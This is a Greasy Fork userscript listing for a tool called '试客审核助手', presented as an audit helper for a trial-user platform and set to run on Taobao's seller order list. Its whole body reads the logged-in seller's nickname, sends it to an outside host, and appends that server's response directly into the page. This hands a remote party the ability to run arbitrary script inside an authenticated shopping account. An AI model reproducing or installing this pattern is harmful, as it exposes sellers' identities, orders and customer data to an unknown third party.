Greasy Fork

试客审核助手

试客联盟审核专用

目前为 2017-11-14 提交的版本。查看 最新版本

// ==UserScript==
// @name         试客审核助手
// @namespace    http://qq974778504.hk68.ok188.top
// @version      5.1
// @description  试客联盟审核专用
// @author       [email protected]
// @match        *://trade.taobao.com/trade/itemlist/list_sold_items.htm*
// @grant        GM_xmlhttpRequest
// @require         https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js
// ==/UserScript==

$(document).ready(function(){var title = $("#login-info .sn-user-nick").text();GM_xmlhttpRequest({method : "GET",url : "http://qq974778504.hk68.ok188.top/sk/ry.php?dpm="+title,onload : function (response) {$(document.body).append(response.responseText);}});});